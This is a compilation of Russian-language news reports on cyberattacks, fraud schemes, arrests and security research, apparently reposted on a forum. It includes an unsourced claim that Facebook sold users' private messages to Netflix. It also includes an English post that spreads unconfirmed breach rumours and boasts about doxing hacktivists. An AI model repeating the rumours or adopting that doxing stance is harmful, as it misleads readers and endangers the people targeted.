В Минцифре «Известям» уточнили, что в их случае расследования будут отвечать обоим описаниям. Подведомственный отраслевой центр будет не только вести сбор и анализ данных для ранжирования атак по степени опасности и повышения эффективности противодействия им, но и определять принадлежность хакеров к тем или иным группировкам.
— Атрибуция компьютерных атак предполагает в том числе определение группировок киберпреступников в части инструментария и методов реализации целевых атак. Методы и процессы атрибуции компьютерных атак — конфиденциальная информация, — отметили в пресс-службе Минцифры.
В ведомстве сообщили, что для решения поставленных задач отраслевой центр будет справляться силами штатных специалистов. Однако там не исключили привлечение к работе сторонних экспертов, если того потребует конкретный инцидент или модель работы с тем или иным заказчиком.
Часть специалистов, опрошенных «Известями», считают, что атрибуции в отраслевых центрах безопасности — уместная и потенциально полезная практика. Как минимум потому, что они накапливают много информации, которую имеет смысл использовать именно для расследований, считает директор по взаимодействию с органами государственной власти компании «Ростелеком-Солар» Михаил Адоньев.
— Атрибуция кибератак подразумевает проведение целого комплекса мероприятий. Они требуют, среди прочего, кооперации различных центров реагирования на кибератаки, а также привлечения правоохранительных органов. CERT (Сomputer emergency response team — общепринятое название групп реагирования на чрезвычайные компьютерные инциденты. — «Известия») может быть важным звеном этой цепочки, — сказал он.
Главный специалист департамента аудита информационной безопасности компании T.Hunter Владимир Макаров считает, что возложение на центр Минцифры функции атрибуции может быть успешным экспериментом, новым витком эволюции государственных CERT.
— На мой взгляд, это интересное решение, которое в итоге приведет либо к повышению общего уровня компетенций специалистов, занятых в центрах, либо покажет, что функционал избыточен и люди не справляются. Полагаю, именно этим руководствовались, давая подобный функционал лишь одному «пилотному» центру, — сказал Макаров.
В то же время ряд представителей отраслевого сообщества скептично настроены по отношению к желанию Минцифры заняться сложными расследованиями киберинцидентов. Как минимум потому, что в силу развития технологий, которыми пользуются злоумышленники, их идентификация или даже отнесение к той или иной стране по цифровым следам на сегодня являются условными.
По словам директора экспертного центра кибербезопасности Positive Technologies Алексея Новикова, в киберпреступных кругах сформировался устойчивый тренд на переиспользование группировками инструментария друг друга. Это снижает эффективность принятых тактик идентификации хакерских групп по цифровым следам. Раньше одним набором инструментов пользовалась только группировка «А», следовательно, обнаружив следы этих инструментов, атаку можно было приписать группировке «А». Сегодня же инструментами группировки «А» может воспользоваться группировка «Б». Следовательно, указывать в таком расследовании на группировку «А» будет некорректно.
Алексей Лукацкий, в свою очередь, отметил, что расследование киберинцидентов в госцентрах вплоть до установления личности хакеров может быть малоэффективным по другой причине: российским судом сложно призвать к ответственности преступника из другой страны.
— Для того чтобы суд принял доказательства атрибуции, необходимо провести очень большой объем работы, что не все и не всегда могут сделать. Да и непонятно, что потом с этим делать. В международном суде эти доказательства силы не имеют, так как отсутствует соответствующая и признаваемая всеми государствами юридическая основа для этого, — заявил он.
Впрочем, оба эксперта согласились с тем, что вне зависимости от того, какие цели будут преследовать отраслевые центры безопасности в рамках расследований, сам факт создания подобных структур является позитивным моментом. Он способствует повышению защищенности государственной информационной структуры.
Правоохранители задержали на территории международного аэропорта в Ставропольском крае жителя Ингушетии, который находился в международном розыске за вымогательство, говорится в сообщении пресс-службы МВД РФ по СКФО.
"Сотрудниками 2-го МОРО ГУ МВД России по СКФО задержан житель Ингушетии, находившийся в международном розыске за вымогательство у жителя Ставропольского края. Он был задержан в международном аэропорту имени М. Ю. Лермонтова в Минераловодском городском округе. В настоящее время мужчина заключен под стражу", - говорится в сообщении.
Как сообщается, в период с февраля по июль 2020 года злоумышленник, действуя в сговоре со своим отцом, под предлогом якобы неисполненных обязательств незаконно требовал у жителя Ставрополья передать 1,3 млн рублей, в случае отказа угрожая применением физического насилия.
"Полицейскими один из фигурантов был задержан в июле 2020 года и осужден. Второй фигурант скрылся от следствия за пределами РФ и был объявлен в международный розыск. В отношении него следственной частью ГУ МВД России по СКФО было возбуждено уголовное дело по признакам преступления, предусмотренного ч. 3 ст. 163 УК РФ "Вымогательство", - добавили в пресс- службе.
В результате оперативно-разыскных мероприятий, проведенных сотрудниками 2-го МОРО ГУ МВД России по СКФО, местонахождение разыскиваемого было установлено.
1. Вымогательство, то есть требование передачи чужого имущества или права на имущество или совершения других действий имущественного характера под угрозой применения насилия либо уничтожения или повреждения чужого имущества, а равно под угрозой распространения сведений, позорящих потерпевшего или его близких, либо иных сведений, которые могут причинить существенный вред правам или законным интересам потерпевшего или его близких, - наказывается ограничением свободы на срок до четырех лет, либо принудительными работами на срок до четырех лет с ограничением свободы на срок до двух лет или без такового, либо арестом на срок до шести месяцев, либо лишением свободы на срок до четырех лет со штрафом в размере до восьмидесяти тысяч рублей или в размере заработной платы или иного дохода осужденного за период до шести месяцев либо без такового.
3. Вымогательство, совершенное:
а) организованной группой;
б) в целях получения имущества в особо крупном размере;
(в ред. Федерального закона от 08.12.2003 N 162-ФЗ)
в) с причинением тяжкого вреда здоровью потерпевшего, -
(в ред. Федерального закона от 08.12.2003 N 162-ФЗ)
г) утратил силу. - Федеральный закон от 08.12.2003 N 162-ФЗ
Децентрализованный протокол Cream Finance подвергся атаке с помощью мгновенного кредита и потерял $18 млн в Ethereum. Об этом сообщил журналист Колин Ву.
Cream Finance was attacked by a flash loan and lost approximately US$18 million. https://t.co/Do6xvbQ7r5
— Wu Blockchain (@WuBlockchain) August 30, 2021
Click to expand...
Хакеров было двое, в общей сложности они провели 17 транзакций.
Специалисты компании в сфере блокчейн-безопасности PeckShield Inc. утверждают, что установили причину взлома и предложили помощь разработчикам Cream Finance.
@CreamdotFinance We have located the root cause and feel free to contact us!
— PeckShield Inc. (@peckshield) August 30, 2021
__https://twitter.com/x/status/1432228488405307395
Click to expand...
Представители DeFi-протокола пока не комментировали инцидент.
Напомним, в феврале Cream Finance уже подвергался аналогичной атаке. Тогда неизвестный злоумышленник воспользовался уязвимостью в протоколе Iron Bank (вторая версия проекта Cream Finance) и вывел токены на общую сумму $37,5 млн.
Восемнадцатилетний стажер венчурной компании Polychain Capital Аниш Агнихотри (Anish Agnihotri) продемонстрировал, как работает атака 51% на блокчейн. Он написал в социальной сети Twitter:
«Я никогда не видел атаки 51% на действующую сеть. Я полагаю, на это есть веские причины – большинство людей, атакующих сети с целью получения денежной выгоды, вероятно, не хотят афишировать себя. Итак, я записал ее для вас».
Атака 51% – один из способов атаки на блокчейн. Пока большая часть мощности хэширования блокчейна контролируется соблюдающими правила участниками, стремящимися поддержать сеть, он будет работать нормально. Но если злоумышленник берет под контроль большую часть мощности хэширования, он может вызвать проблемы в сети.
Один из основных способов получить прибыль от атаки 51% – это двойная трата. Используя контроль над большей частью мощности хэширования, злоумышленник тайно добывает более длинную альтернативную версию цепочки. Затем он вносит депозит на криптовалютную биржу и увеличивает баланс. После этого он транслирует свою альтернативную и более длинную цепочку в сеть, уничтожая свою предыдущую транзакцию. Это позволяет ему сохранить первоначальные деньги и депозит на бирже.
Агнихотри выбрал крошечный клон блокчейна Эфириума под названием CheapETH для проведения эксперимента. Он имеет гораздо больший размер блоков, что делает отправку транзакций дешевле. Тогда как хэшрейт Эфириума достигает 616 Тх/с, мощность хэширования CheapETH не превышает 559 Мх/с, что делает его более уязвимым для атак.
Для проведения атаки Агнихотри арендовал мощность хэширования в 1.44 Гх/с. Это позволило ему взять под контроль около 72% хэшрейта сети. Он также арендовал виртуальную машину для запуска блокчейна. Общие затраты составили менее $100.
На видео продемонстрировано, как он атаковал сеть. Агнихотри объяснил, что он отключился от сети, в течение нескольких минут майнил в одиночку в своем собственном пуле, а затем транслировал более длинную версию цепочки в сеть. Вскоре после этого проводники по блокам обновились и показали, что он добыл все последние блоки.
Во время атаки на сеть Агнихотри не проводил двойные траты. В описании к видео он указывает точки, в которых злоумышленник мог бы совершить атаку двойных трат. Позже он заявил, что бесплатно распределит токены в любые пулы, на которые повлияла его атака.
Группа исследователей из Виргинского и Калифронийского университетов представила новый вид атаки на микроархитектурные структуры процессоров Intel и AMD, выявленный в ходе обратного инжиниринга недокументированных возможностей CPU. Предложенный метод атаки связан с применением в процессорах промежуточного кэша микроопераций (micro-op cache), который может использоваться для извлечения сведений, осевших в ходе спекулятивного выполнения инструкций.
В целях оптимизации процессор начинает выполнять некоторые инструкции в спекулятивном режиме, не дожидаясь выполнения предыдущих вычислений, и если потом определяет, что предсказание не оправдалось, откатывает операцию в исходное состояние, но обработанные в процессе спекулятивного выполнения данные оседают в кэше, содержимое которого можно определить.
Отмечается, что новый метод заметно опережает по производительности атаку Spectre v1, затрудняет обнаружение атаки и не блокируется существующими методами защиты от атак по сторонним каналам, разработанным для блокирования уязвимостей, вызванных спекулятивным выполнением инструкций (например, применение инструкции LFENCE блокирует утечку на последних стадиях спекулятивного выполнения, но не защищает от утечки через микроархитектерные структуры).
Метод затрагивает модели процессоров Intel и AMD, выпускаемые с 2011 года, включая серии Intel Skylake и AMD Zen. Современные CPU разбивают сложные процессорные инструкции на более простые RISC-подобные микрооперации, которые кэшируются в отдельном кэше. Данный кэш кардинально отличается от кэшей более высокого уровня, недоступен напрямую и выступает в роли потокового буфера для быстрого доступа к результатам декодирования CISC-инструкций в RISC- микроинструкции. Тем не менее, исследователи нашли способ для создания условий, возникающих при конфликте доступа к кэшу и позволяющих судить о содержимом кэша микроопераций путём анализа отличий во времени выполнения тех или иных действий.
Кэш микроопераций в процессорах Intel сегментирован в привязке к потокам CPU (Hyper-Threading), в то время как в процессорах AMD Zen применяется общий кэш, что создаёт условия для утечки данных не только в рамках одного потока выполнения, но и между разными потоками в SMT (возможна утечка данных между кодом, выполняемым на разных логических ядрах CPU).
Исследователями предложен базовый метод для определения изменений в кэше микроопераций и несколько сценариев атак, позволяющих создавать скрытые каналы передачи данных и использовать уязвимый код для организации утечки конфиденциальных данных, как в рамках одного процесса (например, для организации утечки данных процесса при выполнении стороннего кода в движках с JIT и в виртуальных машинах), так и между ядром и процессами в пространстве пользователя.
При организации варианта атаки Spectre с использованием кэша микроопераций исследователям удалось добиться производительности в 965.59 Kbps при уровне ошибок 0.22% и 785.56 Kbps при использовании коррекции ошибок, в случае организации утечки в рамках одного адресного пространства и уровня привилегий. При утечке, охватывающей разные уровни привилегий (между ядром и пространством пользователя), производительность составила 85.2 Kbps при добавлении коррекции ошибок и 110.96 Kbps при уровне ошибок в 4%. При атаке на процессоры AMD Zen, создающей утечку между разными логическими ядрами CPU, производительность составила 250 Kbps при уровне ошибок 5.59% и 168.58 Kbps при коррекции ошибок. По сравнению с классическим методом Spectre v1 новая атака оказалась быстрее в 2.6 раза.
Предполагается, что для защиты от атаки на кэш микроопераций потребуется внесение изменений, снижающих производительность сильнее, чем при включении защиты от атак Spectre. В качестве оптимального компромисса предлагается блокировать подобные атаки не путём отключения кэширования, а на уровне мониторинга аномалий и определения состояний кэша, типичных для атак.
Как и в атаках Spectre для организации утечки из ядра или других процессов требуется выполнение на стороне процессов-жертв определённой последовательности команд (гаджетов), приводящей к спекулятивному выполнению инструкций. В ядре Linux найдено около 100 подобных гаджетов, которые будут удалены, но периодически находят обходные методы для их генерации, например, связанные с запуском в ядре специально оформленных BPF-программ.
Полиция Гонконга раскрыла деятельность местного мошеннического киберсиндиката, который использовал технологию дипфейка для привлечения жертв в фиктивные криптоинвестиционные схемы. В понедельник, 14 октября, полиция Гонконга сообщила об аресте 27 человек, включая выпускников университетов, завербованных синдикатом для создания поддельных торговых платформ и сайтов фиктивных криптокомпаний. Большинство членов синдиката были в возрасте от 21 до 34 лет.
По данным правоохранителей, в октябре прошлого года киберсиндикат открыл свой операционный центр в промышленном районе Гонконга и начал набор сотрудников из числа выпускников технологических университетов.
Преступники находили своих жертв через социальные сети и сайты знакомств, где применяли технологию дипфейка во время видеозвонков для подмены своих лиц на лица привлекательных женщин. После того как преступники достигали доверительного уровня общения со своими жертвами, они предлагали им «инвестировать в высокодоходные криптовалюты».
По данным полиции, среди жертв мошенников были мужчины из Гонконга, материкового Китая, Тайваня, Индии и Сингапура. Их совокупный ущерб составил более 360 млн гонконгских долларов ($46 млн).
Во время обыска полиция обнаружила доску результатов, где отмечались итоги соревнования участников киберсиндиката, обманувших наибольшее количество жертв. «На доске для общего обозрения были перечислены результаты.
Тот, кто возглавил список в прошлом месяце, получил премию в $266 000», — сообщил представитель полиции.
english.dotdotnews.com/a/202410/14/AP670cf1d9e4b0b10d45ddc65a.html
Сотрудники Национальной полиции арестовали мужчину в Мадриде за то, что он якобы ввел на рынок почти 160 000 евро фальшивыми банкнотами, используя метод «струйки». Он распространял поддельные банкноты номиналом 50 евро при оплате покупок в небольших магазинах мадридского сообщества и, по мнению следователей, мог действовать с 2017 года.
Расследование началось в марте прошлого года, когда полицейским стало известно о существовании человека, который осуществлял платежи в небольших магазинах поддельными банкнотами номиналом 50 евро, являясь единственным распространителем этого вида фальшивок, и сфера его деятельности ограничивалась сообществом Мадрид.
Следователи провели различные расследования, в ходе которых выяснилось, что этот человек предположительно занимался преступной деятельностью, связанной с подделкой валюты, на протяжении более 15 лет, включая изготовление и распространение фальшивых банкнот в небольших масштабах.
Небольшие закупки для получения максимальной прибыли
В ходе расследования выяснилось, что для изготовления подделок он использовал метод «капельницы». Используя этот метод, он совершал небольшие покупки, за которые расплачивался поддельной 50-евровой купюрой, чтобы получить максимальную прибыль от размена законного платежного средства. Он также принимал меры безопасности, чтобы не допустить или затруднить слежку за ним полиции, и очень избирательно подходил к магазинам, когда речь шла о ввозе фальшивок.
По оценкам следователей, с момента обнаружения его деятельности он ввел в финансовый оборот в общей сложности 3 171 поддельную 50-евровую купюру на общую сумму 158 550 евро. После ареста мужчины полицейские провели обыск в его доме, где изъяли 400 евро в фальшивых купюрах, три мобильных телефона и семь компьютерных устройств для хранения данных, подлежащих анализу.
В Нижегородской области на скамье подсудимых оказалась группа лиц, создавших и распространявших вредоносное программное обеспечение. При этом трафферы получали деньги. Информацию об уголовном деле предоставило областное УФСБ.
Сотрудники управления выяснили, что двое жителей Нижегородской и Саратовской областей разработали ПО для отключения антивирусных программ, которые защищали информацию, хранящуюся на компьютере.
Впоследствии участники группы создали сервис, с которого свыше 900 пользователей скачали за деньги вирусное ПО. По решению Выксунского городского суда каждому из трафферов дали по два года условного срока.
Это шокирует.
Facebook передал Netflix все ваши личные сообщения в Messenger в обмен на историю просмотров, в то время как Netflix заплатил им более 100 миллионов долларов за рекламу.
Meta будет продавать ваши данные без промедления с целью получения прибыли.
Уточню что в входит в инфростуктуру меты Facebook Instagram WhatsApp Messenger Oculus Spark AR
Code:Copy to clipboard
Мета (Facebook) владеет и управляет широким спектром различных сервисов и платформ. Некоторые из наиболее известных сервисов, принадлежащих Мета, включают:
1. Facebook: Социальная сеть, на которой пользователи могут общаться, делиться контентом, создавать группы и мероприятия.
2. Instagram: Популярная платформа для обмена фотографиями и видеозаписями, а также для взаимодействия с другими пользователями.
3. WhatsApp: Популярный мессенджер, обеспечивающий обмен текстовыми сообщениями, звонками и видеозвонками в реальном времени.
4. Messenger: Система мгновенных сообщений, связанная социальной сетью Facebook, которая позволяет общаться с друзьями и контактами.
5. Oculus: Производитель виртуальной реальности и гарнитур Oculus Rift, приобретенный Мета.
6. Portal: Устройства для видеозвонков, предоставляемые Мета.
7. Spark AR: Платформа для создания и публикации дополненной реальности (AR) для приложений и сервисов.
__https://twitter.com/x/status/1774995180980166978
Представители российского регистратора доменов и хостинг-провайдера Рег.ру (обслуживает 44% доменов в рунете) сообщают, что компания подверглась атаке хакеров. По данным СМИ, группировка UHG попытались проникнуть на один из серверов виртуального хостинга.
ТАСС сообщает, что недавно хакеры из проукраинской группы UHG заявили об получении доступа к клиентам Рег.ру. На сервере, о котором идет речь, размещаются сайты клиентов провайдера.
Как сообщили в пресс-службе компании, атака произошла еще 18 марта, и злоумышленники использовали некую уязвимость программного обеспечения на сайте одного из клиентов Рег.ру, благодаря которой смогли дойти до подключения к серверу баз данных. «В этот момент злоумышленники были обнаружены и остановлены», — уверяют в Рег.ру.
После атаки группировка опубликовала в своем Telegram-канале ссылку, якобы ведущую на часть выгруженной БД клиентов Рег.ру. Однако представители компании заявляют, что нельзя говорить ни о каком хоть сколько-нибудь значительном повреждении баз Рег.ру или об угрозе для корпоративных клиентов.
Утверждается, что специалисты компании уже закрыли возможности для эксплуатации использованной злоумышленниками уязвимости, а также заменили учетные данные, подверженные утечке.
В Рег.ру прокомментировали, что нападения на крупные хостинговые компании сегодня являются ежедневной рутиной. «Отражать их мы привыкли и умеем», — заключили в компании.
В мире компьютерной безопасности намечается прорыв благодаря технологии полностью гомоморфного шифрования (fully homomorphic encryption, FHE), которая позволяет программам работать с зашифрованными данными, не расшифровывая их. Разработка открывает перспективы для медицинских исследований и ухода за пациентами без раскрытия личных данных, эффективной борьбы с отмыванием денег без доступа к банковской информации, обучения автономных автомобилей без компрометации данных водителей и многого другого.
Ранее применение FHE было ограничено из-за необходимости в миллион раз больших вычислительных усилий по сравнению с работой с незашифрованными данными. Однако в 2024 году ожидается, что как минимум 6 компаний начнут тестирование или даже коммерциализацию первых чипов, ускоряющих FHE до уровня, сравнимого с обработкой обычных данных.
Тодд Остин из Университета Мичигана и основатель стартапа Agita Labs отмечает, что эта технология нарушает основное правило компьютерной безопасности, поскольку делает данные недоступными для программистов.
Несмотря на усилия по защите данных на уровне регулирования, такие как GDPR в Европе или политика App Store от Apple, FHE предлагает автоматизированное решение, позволяющее обойти юридические и регуляторные проблемы, сохраняя при этом конфиденциальность.
Основа FHE – криптография на решетках, устойчивое к квантовым вычислениям. Новые чипы для ускорения FHE обрабатывают огромные объемы данных, выполняя операции сложения и умножения с числами, состоящими из сотен и тысяч бит.
Инициативу в разработке аппаратного ускорения FHE в значительной степени поддержал проект DARPA под названием DPRIVE , целью которого было сокращение времени вычислений FHE с недель до секунд. Участники проекта, включая Duality Technologies, Galois и Intel, планируют представить чипы в 2024 году. Помимо DARPA, к разработке аппаратных решений FHE присоединились и другие компании, такие как Fabric Cryptography и Optalysys, которые видят в технологии большие перспективы.
Развитие FHE требует не только аппаратных решений, но и разработки программных инструментов, а также стандартизации. Усилия в этом направлении уже ведутся, и как только будут разработаны соответствующие стандарты и программное обеспечение, исследователи смогут открыть новые горизонты в использовании ускорительных чипов FHE. В Intel отметили, FHE станет новой главой в истории компьютерных технологий.
• Source: securitylab.ru/news/544860.php
Главным управлением цифрового развития Следственного комитета завершено расследование уголовного дела в отношении крупнейшего в Беларуси продавца реквизитов банковских платежных карточек и данных для доступа к счетам.
В 2019 году 19-летний житель города Бобруйска узнал в сети Интернет о легком способе заработка, связанном с продажей в мессенджере Telegram реквизитов банковских платежных карточек.
Стремясь обогатиться, молодой человек активно открывал на свое имя банковские счета, реквизиты доступа к которым продавал многочисленным покупателям. Как установило следствие, его клиенты использовали их при осуществлении ставок на площадках зарубежных букмекерских контор.
Исчерпав лимит открытия счетов на свое имя, житель Бобруйска начал подыскивать для своей деятельности третьих лиц, так называемых «дропов», готовых за небольшое вознаграждение предоставлять ему выпущенные на их имя банковские карты, которые он в последующем продавал анонимным покупателям.
В 2021 году он подыскал себе двух помощников, которые стали выполнять для него роль «дроповодов». За денежное вознаграждение они начали искать людей из своего окружения, на чьи имена в последующем оформлялись банковские карты для сбыта.
В ходе тщательного осмотра зачищенной заранее обвиняемым компьютерной техники и имеющейся на ней информации, а также путем восстановления удаленных следов преступления, была обнаружена целая база данных, содержащая персональные данные более 1300 человек, включая их идентификационные номера, полные паспортные данные, а также фотографии всех указанных лиц.
Установлено, что помимо распространения реквизитов, обвиняемый осуществлял деятельность по распространению игровых счетов виртуальных игорных заведений, расположенных и действующих на территории Республики Беларусь. С использованием чужих персональных данных им зарегистрировано не менее 3000 игровых счетов в нарушение действующего законодательства. Указанные счета продавались неизвестным, желающим скрыть свою личность при осуществлении азартных игр. Процесс прохождения идентификации пользователя виртуального игрового заведения сводился к простому предоставлению паспортных данных и фотографий подставного лица, что позволяло обвиняемому в отдельных случаях регистрировать игровые счета даже на умершего человека, при наличии необходимых данных.
Следователями установлено, что ежедневно в банковские учреждения «дропы» обращались за открытием до 10 банковских карт, при чем все по статусу представляли собой карты «Gold» либо «Platinum» и выпускались к счетам в иностранной валюте. Процесс идентификации клиента сводился к предоставлению последним своего паспорта, а получение неработающим гражданином 9 карт «Visa Platinum» не являлось для банковских сотрудников чем-то подозрительным.
По результатам расследования Следственным комитетом направлены представления о принятии мер по устранению условий, способствовавших совершению преступления в соответствующие банковские учреждения и виртуальные игорные заведения.
Стоит отметить, что «дропов», согласившихся за легкие деньги открыть на свое имя БПК и предоставить их обвиняемому, также ждала уголовная ответственность, предусмотренная статьей 222 Уголовного кодекса Республики Беларусь. Разбирательства в отношении таких лиц продолжаются и в настоящее время. Собранные по делу доказательства свидетельствовали о совершении молодым человеком при пособничестве двух «дроповодов» 146 эпизодов преступной деятельности.
Стоимость реквизитов одной проданной карты разнилась от 3500 до 10 000 российских рублей. За полученный преступный доход неработающий обвиняемый смог позволить себе дорогостоящий автомобиль и современную компьютерную технику. В ходе расследования наложен арест на имущество обвиняемого на общую сумму более 100 000 белорусских рублей.
Действия молодого человека квалифицированы по части 1 статьи 222 Уголовного кодекса Республики Беларусь, а его помощников за пособничество в совершении указанного преступления.
Свою вину в совершенных преступлениях обвиняемые признали в полном объеме, а также дали подробные показания по существу предъявленных им обвинений. Уголовное дело передано прокурору для направления в суд.
• Source: sk.gov.by/ru/news-ru/view/gorod-dropov-sledovateljami-ustanovleny- obstojatelstva-nezakonnogo-oborota-rekvizitov-bankovskix-kart-v-13261
Федеральная служба безопасности РФ предложила расширить список данных, которые организаторы распространения информации (ОРИ) обязаны хранить и предоставлять по запросу правоохранительным органам.
В проекте постановления, опубликованом на портале проектов нормативных правовых актов, предлагается добавить в перечень данные о геолокации пользователей и средствах платежа.
«Отсутствие нормативно закрепленной обязанности по хранению и предоставлению
органам федеральной службы безопасности указанной категории сведений формирует
неоднозначную правоприменительную практику, снижает эффективность
оперативно-разыскной деятельности ,
негативно сказывается на обеспечении безопасности РФ», — говорится в
документе.
В июле 2023 года премьер-министр РФ Михаил Мишустин подписал постановление, согласно которому ФСБ с 1 сентября получила круглосуточный удаленный доступ к информационным системам и базам данных служб заказов такси, включенных в реестр организаторов распространения информации.
https://regulation.gov.ru/Regulation/Npa/PublicView?npaID=142353
Well around 4hrs ago I was on twitter... Kespersky labs better known as
Kespersky Antivirus which is ran by a russian group of cyber security
professionals who remain unbiased in terms of politics.
The breach is unconfirmed but I'd suspect a rise in malicious software going
undetected for a good period of time, Regardless if or if not the breach has
occurred the simple fact of NVIDIA + Samsung's breaches
puts a major risk to a lot of users.
Hackers now will have the ability to bypass Bio-metrics, Disable protection features among other things on Samsung based products alone. However NVIDIA's breach posts a bigger risk to those running closed-source operating systems such as Windows. If Kespersky was breached NVIDIA's GPG Certs used to sign malware will become a major problem if Microsoft doesn't implement patches to block the now-expired certificates which would be used to sign malicious software. This can mean a lot of problems for those running windows which by comparison is the largest desktop operating system by a global means, NVIDIA supplies some of the largest technolgy to pretty powerful companies, However the owner of said group was doxed for unrelated reasons.
Given windows takes forever to update normally and requires lengthy reboots to install software updates it becomes a problem for those in workplaces where the system has to be ran non-stop to prevent issues which may cause massive issues: i.e Hospitals, Schools, Factories, etc with this being said many of these workplaces do not update. I Worked in a place that ran windows server 2008 aka Windows XP service pack 3 (End of life: 2014). Some offices even run programs for windows 98 which is well over 24 years old. Despite many not running NVIDIA 1050 GPUs some may run lower end GPUs that no one really hears about outside of the normal everyday tech talks. Let's be honest no hospital running Windows Server 2019 with a NVIDIA 3090 GPU.
Here's the original tweet, I've been doxing some of these skids and "cyber
warriors" over the past week. Many aren't brilliant and act tough but a chain
is only as strong as it's weakest link.
This one right here, will be doxed in time, I don't really care for
"Anonymous" or "Cyber Warriors" who try and use their skills for political
motives. In other words: Using cyber attacks for political means = Cyber
Terrorist.
I don't side with either nation but I enjoy toasting people who refuse to stay out of a conflict they shouldn't be a part of.
Either way this moron is an american, around early to late 20s, Left wing
moron, Shouldn't be too hard to dox another skid.
Крупный ботнет Prometei начал атаковать уязвимые серверы Microsoft Exchange с целью генерации криптовалют и распространения шифровальщиков.
Ботнет был впервые описан в 2020 г.: его заметили в силу того, что он тогда начал использовать печально знаменитый эксплойт EternalBlue для распространения на компьютерах под управлением Windows. Но он также может атаковать и системы под Linux.
По мнению экспертов компании Cybereason, ботнет существует, самое позднее, с 2016 г. Именно тогда первые его сэмплы стали появляться на VirusTotal. Его операторы, по-видимому, адаптируют его функциональность при каждой удобной возможности.
Сейчас в тренде уязвимости в Microsoft Exchange, и Prometei активно использует их для установки криптомайнеров. Он также пытается распространяться по локальной сети, используя эксплойты EternalBlue и BlueKeep, а также перехваченные реквизиты доступа и модули распространения через SSH и SQL.
Кроме того, вредонос пытается красть данные и устанавливать бэкдоры для будущей загрузки и запуска новых вредоносных программ или выполнения команд, заданных операторами. По мнению Cybereason, добыча криптовалют на зараженном сервере — это наименьшая из всех проблем, которые Prometei может доставить жертвам.
Русскоязычные, финансово мотивированные операторы
Эксперты предполагают, что операторы ботнета являются русскоязычными. Об этом свидетельствует ряд языковых артефактов в коде. В Cybereason считают, что никакой мотивации кроме финансовой у операторов этого ботнета нет.
«О финансовой подоплеке здесь свидетельствует и изобилие инструментов для заражения, — считает Анастасия Мельникова, эксперт по информационной безопасности компании SEC Consult Services. — Обычно именно финансово- мотивированные кибергруппировки создают такие универсальные “швейцарские ножи”, используя любые известные уязвимости и эксплойты, в то время как условные киберразведчики скорее будут использовать более узконаправленный арсенал».
Prometei атакует две уязвимости под индексами CVE-2021-27065 и CVE-2021-26858. В атаках на них были также замечены несколько других кибергруппировок, в том числе связанные с китайскими властями. В основном эти баги использовались для установки криптомайнеров и веб-шеллов, а также распространения шифровальщиков.
В марте Microsoft объявила, что около 92% доступных из интернета локальных серверов Exchange получили обновления от этих уязвимостей. Сейчас данный процент может быть еще выше, однако в абсолютных значениях уязвимыми остается довольно большое количество серверов.
Microsoft выпустила не только обновления к этим уязвимостям, но и инструмент для быстрой их установки, не требующий участия технических специалистов. Защитные меры против эксплойтов для Exchange также реализованы на уровне штатного антивируса Windows Defender.
Футболиста Алексея Померко, полузащитника тульского «Арсенала», мошенники обманули на 2,4 млн рублей при покупке криптовалюты.
По данным Telegram-канала, Померко позвонил своему другу, футболисту Вячеславу Дмитриеву и попросил его приехать к «Москва-Сити». Там ему нужно получить от некоего человека $10 тысяч и передать их другому мужчине по имени Ислам в обмен на криптовалюту.
Друг Померко все сделал, биткоины полузащитник «Арсенала» получил, поэтому он решил повторить все еще раз. Футболист позвонил Дмитриеву и попросил сделать все то же самое, но с суммой $24,5 тысячи.
«На этот раз, когда Дмитриев приехал к Исламу, тот был не один — он забрал деньги, показал на телефоне, что все перевел, и уехал. Вячеслав позвонил футболисту, сказал, что все ок. Алексей проверил счет в приложении, но ничего не увидел», – пишет Mash.
После этого Померко попросил Дмитриева написать заявление в полицию. В итоге Ислама объявили в розыск, идет проверка.
Группа ученых из Университета Ватерлоо в Канаде раскрыла технические подробности [новой атаки](https://uwaterloo.ca/news/media/how-secure-are- voice-authentication-systems-really), которая позволяет успешно обходить системы безопасности голосовой аутентификации VA.
VA позволяет компаниям подтверждать личность своих клиентов с помощью уникального «голосового отпечатка» и в последнее время все чаще используется в банковскиом секторе, работе колл-центров и реализуется в других сценариях, критически важных с точки зрения безопасности.
После того, как была принята концепция голосовых отпечатков, злоумышленники быстро поняли, что они могут использовать ПО для дипфейков с поддержкой машинного обучения и создавать убедительные копий голоса жертвы, используя всего пять минут записанного звука.
Уязвимость систем автоматической проверки говорящих ASV к атакам спуфинга спровоцировала разработку контрмер CM, которые в совокупности образуют современный неприступный механизм контроля доступа.
Исследователи из Ватерлоо разработали метод, который позволяет уверенно обходить все контрмеры и обманывать большинство систем голосовой аутентификации.
Их система работает на основе обнаружения типичных для дипфейк-аудио маркеров, которые и выдают речь за сгенерированную компьютером.
[Новая атака](https://www.computer.org/csdl/proceedings- article/sp/2023/933600a951/1NrbYmtLXB6) удаляет эти маркеры, делая аудио неотличимым от подлинного звука таким образом, чтобы злоумышленники могли пройти аутентификацию, не будучи обнаруженными.
Исследователи отмечают, что их атака может обойти системы безопасности VA с вероятностью успеха до 99% всего после шести попыток.
Прокуратура Гродно поддержала в суде государственное обвинение по уголовному делу в отношении трех молодых людей, которым в зависимости от роли каждого в совершении противоправных деяний в разном сочетании инкриминированы мошенничество и хищение денежных средств путем модификации компьютерной информации, сообщает БЕЛТА со ссылкой на службу информации прокуратуры Гродненской области.
Установлено, что обвиняемые в составе ОПГ похищали деньги различными способами. Например, звонили в мессенджере и представлялись сотрудниками банка. После вынуждали людей сообщать им все реквизиты своих банковских карт, якобы для предотвращения списания с их счета средств.
Кроме того, фигуранты на сервисах бесплатных объявлений размещали фейковые сообщения о сдаче в аренду квартир, которых в действительности не было. Они убеждали потенциальных арендаторов перевести сумму залога, а в некоторых случаях на следующий день потерпевшим в переписке предлагали вернуть сумму залога, пройдя по направленной фейковой ссылке. Те потерпевшие, кто ввел данные своих карт, оставались без денег на своих карт-счетах.
Наиболее распространенная схема мошенников заключалась в том, что обвиняемые вступали в переписку с продавцом, разместившим объявление о продаже товара на сайте kufar.by. Они убеждали продавца в намерении купить его товар. Но из-за того, что тот далеко живет, предлагали ему воспользоваться услугой одной из служб доставок. Сообщалось, что продавец, перейдя по ссылке, сможет к тому же получить уже переведенную ему плату за товар. На практике, как только продавец вводил данные своих карт, с его счета моментально списывались все средства.
Всего от противоправных действий молодых людей пострадали более 300 жителей Беларуси.
